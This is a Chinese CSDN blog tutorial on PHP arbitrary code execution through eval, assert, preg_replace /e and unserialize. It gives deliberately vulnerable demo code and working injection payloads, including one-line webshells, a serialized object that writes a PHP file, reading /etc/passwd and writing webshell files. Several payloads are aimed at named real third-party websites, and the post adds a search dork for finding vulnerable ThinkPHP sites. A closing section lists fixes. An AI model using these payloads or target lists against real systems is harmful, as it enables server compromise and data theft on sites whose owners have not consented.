任意代码执行

最新推荐文章于 2024-05-13 02:52:10 发布
最新推荐文章于 2024-05-13 02:52:10 发布
阅读量3.6k 收藏
点赞数 2
分类专栏: web安全 文章标签: web安全 任意代码执行 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/le0nis/article/details/52035882
版权

任意代码执行

0x01 成因

几种常用语言,都有将字符串转化成代码去执行的相关函数

  • php 
   eval assert
  • asp 
<%=CreateObject(“wscript.shell”).exec(“cmd.exe /c ipconfig”).StdOut.ReadAll()%>
  • python 
exec
  • java 
Java中没有类似php中eval函数直
接可以将字符串转化为代码执行
的函数,但是有反射机制,如反
射机制的表达式引擎:OGNL SpEL MVEL

0x02 php中能造成代码注入的主要函数

执行代码的函数

  • eval()

  • assert()
    callback回调函数

  • preg_replace()+/e模式
    preg_replace函数原型:

    mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])

    /e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码

    在php中,双引号里面如果包含有变量,php解释器会将其替换为变量解释后的结果;单引号中的变量不会被处理。
注意:双引号中的函数不会被执行和替换。

    反序列化函数

  • unserialize()

    eval()
    执行php代码

demo 1

<?php
$data=$_GET['data'];
eval("\$ret=$data;");
echo $ret;

phpinfo()

http://192.168.188.66/code_inject/1/?data=phpinfo()
http://192.168.188.66/code_inject/1/?data=1;phpinfo();

http://192.168.188.66/code_inject/1/?data=${phpinfo()}

getshell 

http://192.168.188.66/code_inject/1/?data=1;@eval($_POST[a]); 


http://172.16.77.145/code_inject/1.php?data=${eval($_POST[T])}

完整语句构造:

eval("
$data=1;
@eval($_POST[a]);
")

demo 2

<?php
$data=$_GET['data'];
echo "\$ret='$data';";
eval("\$ret=strtolower('$data');");
echo $ret;

phpinfo()

/?data=123');phpinfo();//

完整语句构造: 

$ret=strtolower('123');
闭合单引号
$ret=strtolower('');
phpinfo();//123');

getshell 

/?data=123');eval($_POST[k]);//

demo 3 

<?php
$data = $_GET['data'];
eval("\$ret = strtolower(\"$data\");"); 
echo $ret;

phpinfo()

/?data={${phpinfo()}}
或
/?data=");phpinfo();//

完整语句构造: 

eval("
$ret=strtolower("");
phpinfo();
//");
")
或
eval("
$ret=strtolower("{${phpinfo()}}");

getshell 

/?data={${eval($_POST[k])}}

demo 4

<?php
$data = $_GET['data'];
echo $data;
preg_replace('/<data>(.*)<\/data>/e', '$ret = "\\1";', $data);
echo $ret;

phpinfo()

http://192.168.188.66/code_inject/4/?data=<data>{${phpinfo()}}</data>

完整语句构造: 

$ret="{${phpinfo()}}"

getshell

?data="{${eval($_POST[k])}}"

php反序列化
序列化是对象持久化的一项技术,保存了对象之前的状态和数据,为了方便网络传输。
在php中,可以对数组,变量,对象等进行序列化(静态变量,常量不会被序列化)

<?php
    class TestSerialize{
        private $name;
        private $password;
        const ID = 1234;
        public static $_class_name = __CLASS__;

        public function __set($varname,$value){

            $this->$varname = $value;
        }

        public function __get($varname)
        {
            return $this->$varname;
        }
    }

    $data = array(
            'name'=>'zhangsan',
            'password'=>'pwd123'
        );


    $test = 'abcd';
    $ts = new TestSerialize();
    $ts->name = 'zhangsan_2';
    $ts->password = 'pwd123_2';
    echo  'var=>'.serialize($test).'<br/>';
    echo  'array=>'.serialize($data).'<br/>';
    echo  'object=>'.serialize($ts).'<br/>';

?>

输出结果

var=>s:4:"abcd";
array=>a:2:{s:4:"name";s:8:"zhangsan";s:8:"password";s:6:"pwd123";}
object=>O:13:"TestSerialize":2:{s:19:"TestSerializename";s:10:"zhangsan_2";s:23:"TestSerializepassword";s:8:"pwd123_2";}

如果我们知道代码类的定义,就可以构造代码执行
demo

服务端代码

<?php class foo {
public $file = "test.txt"; public $data = "123456";
function __destruct() { file_put_contents($this->file, $this->data);
} }
$d = $_REQUEST['str'];
var_dump($d);
echo "<br>";
$tc = unserialize( base64_decode( $d ) ); //$tc = unserialize($_POST["str"]); var_dump($tc);

我们构造序列化

<?php class foo {
public $file = "test.txt"; public $data = "123456";
function __destruct() { file_put_contents($this->file, $this->data);
} }
$f = new foo();
$f->file = "1.php";
$f->data = "<? phpinfo(); ?>";
echo base64_encode(serialize($f));

生成

TzozOiJmb28iOjI6e3M6NDoiZmlsZSI7czo1OiIxLnBocCI7czo0OiJkYXRhIjtzOjE2OiI8PyBwaHBpbmZvKCk7ID8+Ijt9

将生成的值提交给服务端就产生了漏洞

0x03 危害

  • 一句话木马
http://www.shichidachina.com/News/detail/item/{${@eval($_POST[1999])}}
  • 获取当前工作路径 
http://www.shichidachina.com/News/detail/item/{${print(getcwd())}}
  • 读文件
http://www.shichidachina.com/News/detail/item/{$ {exit(var_dump(file_get_contents($_POST[f])))}}
f=/etc/passwd
  • 写webshell
http://www.shichidachina.com/News/detail/item/{$
{exit(var_dump(file_put_contents($_POST[f], $_POST[d])))}} f=h4lp.php&d=22222

0x04 寻找漏洞

thinkphp 框架 可能存在 代码执行漏洞的
搜索方式 intext:thinkphp intext:”Fast & Simple OOP PHP Framework” intext:”2.1”

http://www.sinosteelchem.com/product_detail_en/id/$%7B%20phpinfo()%20%7D
http://www.sjzy.org/index/rzkc_view/fid/70/eid/$%7B%20phpinfo()%7D
http://www.shichidachina.com/News/detail/item/$%7B@%20phpinfo()%20%7D

0x05 修补

eval()

  • 能使用json保存数组、对象就使用json格式,不要将php对象保存成字符串,否则读取的时候需要使用eval
  • 对于必须使用eval的情况,一定要保证用户不能轻易接触eval的参数(或用正则判断输入的数据格式)
  • 对于字符串,一定要使用单引号包裹可控代码,并在插入前进行addslashes
$data = addslashes($data); 
eval("\$data = deal('$data');");

preg_replace()

  • 放弃使用preg_replace的e修饰符
  • 使用preg_replace_callback()替换
  • 如果非要使用preg_replace()+e修饰符,请保证第二个参数中,对于正则匹配出的对象,用单引号包裹
Le0nis
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
任意代码执行漏洞简介
18年3月萌新白帽子
06-24 6502
一、任意代码执行漏洞思维导图:代码执行漏洞的成因:应用程序在调用一些能够将字符串转换为代码的函数(例如php的eval),没有考虑用户是否控制这个字符串,将造成代码执行漏洞。代码执行漏洞的常用函数PHP:eval,assert,preg_replace()+/e 模式Javascript:evalVbscript:Execute、EvalPython: execJava: Java没有类似p...
任意代码执行漏洞
LJH1999ZN的博客
02-23 3122
一、什么是任意代码执行漏洞 web应用程序是指程序员在代码使用了一些执行函数例如eval,assert等函数,用户可以控制这个字符串去这些函数执行,从而造成安全漏洞 二、漏洞的危害 执行任意代码,例如协议脚本文件 向网站写入webshell 控制整个网站或者服务器 三、任意代码执行的漏洞 1.eval()函数 ...
RCE漏洞总结及绕过---代码执行
最新发布
2401_84972745的博客
05-13 996
eval():该函数把字符串当做php代码来计算,并且字符串必须是合法的php代码,要以分号结尾;assert():该函数会检查一个指定断言。断言是一个逻辑学词汇,主要用于程序员来进行假设判断。断言只有两种类型,字符串型或者布尔型,当断言为flse时返回字符串表达式。如果断言是字符串那么会当做php代码执行;preg_replace():/e模式 正则匹配替换字符串,7.0版本后/e已经移除了;
任意代码执行(简称ACE)是指攻击者能够讓目标電腦或目标进程执行任意命令或代码
weixin_40191861的博客
08-21 228
(简称ACE)是指攻击者能够讓目标電腦或目标执行任意命令或代码。如果系統有地方可以被以執行任意代碼,則此處被稱為。特別設計利用此一漏洞的程式,稱為。可以通过网络(尤其是通过互联网等广域网)讓目标電腦(遠程電腦)執行任意代码的能力稱為(RCE)。
转载--Typecho install.php 反序列化导致任意代码执行
weixin_30843605的博客
11-20 446
转载--Typecho install.php 反序列化导致任意代码执行 原文链接(http://p0sec.net/index.php/archives/114/) 0x00 前言 漏洞公布已经过去一段时间了,当时只是利用了一下,并没有进行深度分析,现转载文章以便以后查看。 听说了这个洞,吓得赶紧去看了一下自己的博客,发现自己招了,赶紧删除install目录。 恶意代码的...
java 任意代码执行漏洞_SpringMVC框架任意代码执行漏洞(CVE-2010-1622)分析
weixin_39732506的博客
03-02 2381
CVE-2010-1622很老的的一个洞了,最近在分析Spring之前的漏洞时看到的。利用思路很有意思,因为这个功能其实之前开发的时候也经常用,当然也有很多局限性。有点类似js原型链攻击的感觉,这里分享出来。介绍CVE-2010-1622因为Spring框架使用了不安全的表单绑定对象功能。这个机制允许攻击者修改加载对象的类加载器的属性,可能导致拒绝服务和任意命令执行漏洞。Versions Aff...
无数:任意代码执行
02-04
【标题】:“无数:任意代码执行” 在编程和网络安全领域,“任意代码执行”是一个非常重要的概念,它涉及到程序设计安全漏洞以及攻击者可能利用的潜在风险。标题“无数:任意代码执行”可能指的是一个项目或者...
PbootCMS任意代码执行(从v1.0.1到v2.0.9)的前世今生1
08-03
PbootCMS任意代码执行(从v1.0.1到v2.0.9)的前世今生1
python反序列化漏洞 任意代码执行
01-20
这篇博客我将介绍 python反序列化漏洞 任意代码执行 那么怎么反序列化运行任意代码呢? 首先要说说__reduce__这个魔术方法, 这个方法用来表明类的对象应当如何序列化, 当其返回tuple类型时就可以实现任意代码...
ThinkPHP框架任意代码执行漏洞的利用及其修复方法
10-25
主要介绍了ThinkPHP框架任意代码执行漏洞的利用及其修复方法,该漏洞的修复对于广大使用ThinkPHP的开发人员来说尤为重要!需要的朋友可以参考下
ThinkPwn:Lenovo ThinkPad System Management Mode任意代码执行0day利用
03-11
"ThinkPwn:Lenovo ThinkPad System Management Mode任意代码执行0day利用"这个标题揭示了这是一个关于安全漏洞的研究,具体是针对联想ThinkPad笔记本电脑的System Management Mode(SMM)的0day漏洞。0day漏洞是指...
9_任意代码执行(字符串转换成代码执行)
weixin_33904756的博客
08-31 2721
一、背景介绍   当应用在调用一些能将字符串转化为代码的函数(如php的eval)时,没有考虑用户是否能控制这个字符串,将造成代码注入漏洞。狭义的代码注入通常指将可执行代码注入到当前页面,如php的eval函数,可以将字符串代表的代码作为php代码执行,当用户能够控制这段字符串时,将产生代码注入代码注入漏洞(也称命令执行)。广义上的代码注入,可以覆盖大半安全漏洞的分类。 二、漏洞成因  ...
第十一天任意代码执行漏洞
代码审计
03-16 1481
这里写目录标题一级目录二级目录三级目录 一级目录 二级目录 三级目录 在Web应用有时候程序员为了考虑灵活性、简洁性,会在代码调用eval函数(PHP函数)去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。 代码执行 和 命令执行 代码执行 后端语言执行 php java .net nodejs 命令执行 调用系统接口 面试喜欢问 代码执行常见的函数 代码执行各函数之间的特点 代码执行如何修复 bypass disable fu nctiO
任意代码执行(简称ACE)是指攻击者能够讓目标電腦或目标进程执行任意命令或代码
weixin_40191861的博客
11-08 119
(简称ACE)是指攻击者能够讓目标電腦或目标执行任意命令或代码。如果系統有地方可以被以執行任意代碼,則此處被稱為。特別設計利用此一漏洞的程式,稱為。可以通过网络(尤其是通过互联网等广域网)讓目标電腦(遠程電腦)執行任意代码的能力稱為(RCE)。
任意代码执行实例
weixin_30423977的博客
08-13 600
查看网站当前路径 {${print(getcwd())}} 读phpinfo() ${@phpinfo()} 一句话getshell {${eval($_POST[1])}} 上传大马上传不上去,对网站根目录没有写权限。。。。。。。。。。。。。。。。。。。。。。 回忆是一座桥,却是通往寂寞的牢、 不回头,一直走 加油,加油,加油,给自己一个拥抱 ...
C/C++安全编程条例
躬行纸上浅知
08-05 1万+
术语定义 规则:编程时必须遵守的约定。 建议:编程时必须加以考虑的约定。 说明:对此规则/建议进行必要的解释。 错误示例:对此规则/建议从反面给出例子。 推荐做法:对此规则/建议从正面给出例子。 通用规则 规则1:对外部输入进行校验 说明:软件最为普遍的缺陷就是对来自客户端或者外部环境的数据没有进行正确的合法性校验。这种缺陷可以导致几乎所有的程序弱点,例如Dos、内存越界、命令...
Java选择题(八)
Ctra_aaa的博客
03-25 3294
1.若在某一个类定义定义有如下的方法: abstract void performDial( ); 该方法属于() 正确答案: D 你的答案: D (正确) A.本地方法 B.最终方法 C.解态方法 D.抽象方法 解释: 本地方法:简单地讲,一个native Method就是一个java调用非java代码的接口;native方法表示该方法要用另外一种依赖平台的编程语言实现。 最终方法:final void B(){},这样定义的方法就是最终方法,最终方法在子类不可以被重写,也就是说,如果有个子类继
操作系统一二章作业答案
热门推荐
SpadgerZ的博客
09-28 2万+
因为都是按照自己的理解写出来的,也不知自己的答案对不对,希望大家能够踊跃讨论。提供自己宝贵的意见,不胜感激。 1.1在多道分时环境下,有几个用户同时使用一个系统,这种情况可能导致各种安全问题。 a. 列出此类的问题。 b.在一个分时系统,能否像在特殊用途系统一样确认同样的安全程度?并解释它。 答: a.可能出现的问题: (1)  因为多道分时环境是采用多道程序批处理系统和分时系统结
任意代码执行能提权吗
07-28
任意代码执行通常是指在一个程序执行外部传入的代码,这可能会导致安全风险。然而,提升权限通常需要更多的特权和访问权限,而不仅仅是执行任意代码。 在安全性良好的系统操作系统和应用程序会使用各种安全...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值